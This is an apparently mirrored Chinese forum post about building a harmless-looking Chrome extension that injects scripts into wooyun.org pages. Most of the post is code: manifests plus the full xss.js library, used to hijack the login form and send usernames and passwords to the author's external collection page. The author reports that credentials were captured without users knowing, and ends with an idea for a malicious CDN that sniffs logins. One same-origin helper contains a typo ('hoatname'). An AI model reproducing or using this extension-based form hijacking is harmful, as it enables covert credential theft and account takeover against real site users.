WooYun Zone镜像——利用Chrome插件向指定页面植入js,劫持 XSS,一些猥琐的想法与实践

admin 7月前 191

0x00 Chrome插件

--------------------------

这个想法是昨天看到@紫梦芊 的帖子想起来的。

想法如下:

Chrome插件是可以通过manifest.json的控制,向指定页面植入contentscript.js里的脚本的。那么,能不能在一个看似正常的插件里,安放一个小功能:在所有乌云的页面里<script src=//xsser.me></script>呢?

于是,开始实践。(为了方便,只是弹了一个小框框)。

Manifest.json内容:

{

  "name": "XiaoChaJian",

  "version": "1.0",

  "manifest_version": 2,

  "author":"VIP",

  "icons": {

      "128": "icon.png"

   },

  "permissions": [

    "tabs","http://*/*","https://*/*"

  ],

  "content_scripts": [

    {"js":["contentscript.js"],"matches": ["http://wooyun.org/*","http://*.wooyun.org/*"]}

   ]

}

contentscript.js内容:

alert(/xss/);


那么,将弹框换成xsser.me,是不是就能截获想要的cookies了呢?

很遗憾,这种方法在乌云无效,因为乌云的cookies是HTTP-ONLY的。虽然插件上也能获取http-only的cookies(像Edit this cookie和cookie快速模拟一样),但是很麻烦,于是,又有一个猥琐的想法诞生了:在乌云的登录页面中,插入@Sogili的xss.js来劫持表单,是不是就能把用户名和密码发送到我们想要的地方去了呢?

开始实践:

Manifest.json内容:

{

  "name": "JieChiBiaoDan",

  "version": "1.0",

  "manifest_version": 2,

"author":"VIP",

  "icons": {

      "128": "icon.png"

},

  "permissions": [

    "tabs","http://*/*","https://*/*"

  ],

"content_scripts": [

    {"js":["contentscript.js"],"matches":

["http://wooyun.org/user.php?

action=login*","http://www.wooyun.org/user.php?action=login*"]}

]

}

contentscript.js内容:

;;var xss = function(){

  var x = {

    'name':'xss.js',

    'version':'0.2.1',

    'author':'长短短(sogili)'

  };

  x.x=function(id){return document.getElementById(id)};

  //容错取值

  x.e=function(_){try{return eval('('+_+')')}catch(e){return''}};

  //浏览器

  x.i={

    i:!!self.ActiveXObject&&(function(){

      for(var v=6,s=document.createElement('s');

        s.innerHTML='<![if gt IE '+(v++)+']

><i></i><![endif]-->',

        s.getElementsByTagName('i')[0];);

      return v;

    }()),

    c:!!self.chrome,

    f:self.mozPaintCount>-1,

    o:!!self.opera,

    s:!self.chrome&&!!self.WebKitPoint

  };

  //UA

  x.ua = navigator.userAgent;

  //判断是否为苹果手持设备

  x.apple=/ip(one|ad|od)/i.test(x.ua);

  //随机数

  x.rdm=function(){return~~(Math.random()*1e5)};

  //url编码(UTF8)

  x.ec=encodeURIComponent;

  x.html=function(){

    return document.getElementsByTagName('html')[0]

        ||document.write('<html>')

        ||document.getElementsByTagName

('html')[0];

  };

  /*

   * 销毁一个元素

   */

  x.kill=function(e){

    e.parentElement.removeChild(e);

  };

  /*

   *绑定事件

   */

  x.bind=function(e,name,fn){

    e.addEventListener?e.addEventListener

(name,fn,false):e.attachEvent("on"+name,fn);

  };

  /*

   * dom准备完毕时执行函数

   */

  x.ready=function(fn){

    if(!x.i.i){

      x.bind(document,'DOMContentLoaded',fn);

    }else{

      var s = setInterval(function(){

        try{

          document.body.doScroll('left');

          clearInterval(s);

          fn();

        }catch(e){}

      },4);

    }

  }

  /*

   * 同源检测

   */

  x.o=function(url){

    var link = x.dom('<a href="'+encodeURI(url)+'">',1);

    return link.protocol+link.hoatname+':'+(link.port||80)

==location.protocol+location.hoatname+':'+(location.port||80);

  };

  /*

   * html to dom

   */

  x.dom=function(html,gcsec){

    var tmp = document.createElement('span');

    tmp.innerHTML=html;

    var e = tmp.children[0];

    e.style.display='none';

    x.html().appendChild(e);

    gcsec>>0>0&&setTimeout(function(){

      x.kill(e);

    },gcsec*1000);

    return e;

  };

  /*

   * ajax

   */

  x.ajax=function(url,params,callback){

    (params instanceof Function)&&

(callback=params,params=void(0));

    var XHR = (!x.o(url)&&window.XDomainRequest)||

          window.XMLHttpRequest||

          (function(){return new ActiveXObject

('MSXML2.XMLHTTP')});

    var xhr = new XHR();

    xhr.open(params?'post':'get',url);

    xhr.withCredentials = true;

    try{params&&xhr.setRequestHeader('content-

type','application/x-www-form-urlencoded');}catch(e){}

    callback&&(xhr.onreadystatechange = function() {

      (this.readyState == 4 && ((this.status >= 200

&& this.status <= 300) || this.status == 304))&&callback.apply

(this,arguments);

    });

    xhr.send(params);

  };

  /*

   * CSRF

   */

  x.csrf=function(url,params,callback){

    (params instanceof Function)&&

(callback=params,params=void(0));

    if(params){

      var form = x.dom('<form method=post>');

      form.action=url;

      for(var name in params){

        var input = document.createElement

('input');

        input.name=name;

        input.value=params[name];

        form.appendChild(input);

      }

      var iframe = x.dom('<iframe sandbox

name=_'+x.rdm()+'_>',6);

      callback&&setTimeout(function(){

        x.bind(iframe,'load',callback);

      },30);

      form.target=iframe.name;

      form.submit();

    }else{

      var img = new Image();

      callback&&(img.onerror=callback);

      img.src=url;

    }

  };

  /*

   * 表单劫持

   */

  x.xform=function(form,action){

form.old_action=form.action,form.old_target=form.target,form.action=act

ion;

    var iframe = x.dom('<iframe name=_'+x.rdm()+'_>');

    form.target=iframe.name;

    setTimeout(function(){

      x.bind(iframe,'load',function(){

form.action=form.old_action,form.target=form.old_target,form.onsubmit=n

ull,form.submit();

      });

    },30);

  };

  /*

   * 函数代理

   */

  x.proxy=function(fn,before,after){

    return function(){

      before&&before.apply(this,arguments);

      var result = fn.apply(this,arguments);

      after&&after.apply(this,arguments);

      return result;

    }

  };

  return x;

}();

xss.xform(document.forms[1],'http://vip.yupage.com/wy.php');//劫持表单

http://vip.yupage.com/wy.php是我做好的一个接收页面,代码如下:

开始测试,打开登录页,填好用户名密码验证码,点击登录,首先会像我的接收页发起POST,然后才会POST乌云。


再去看看,用户名密码已经躺在那里了。

在不知情的情况下,用户名和密码就这样被劫持走了。乌云的wb转账功能可是没有二次验证的哦。

0x01 CDN

---------------

现在有许许多多的网站使用了CDN来进行加速/防D等。

去搜索了下CDN的工作原理,大概是这样的。

用户访问-》自动分配最快的节点-》请求原服务器-------

返回给用户《-返回给节点服务器《-原服务器返回数据<-|

那么,能不能搭建一台恶意的CDN,然后嗅探所有使用了该CDN的网站的用户名密码呢?

这个就没办法实践了,去搜索了一个相关案例:

http://wooyun.org/bugs/wooyun-2010-016562

更多猥琐想法欢迎补充~


最新回复 (0)
返回
发新帖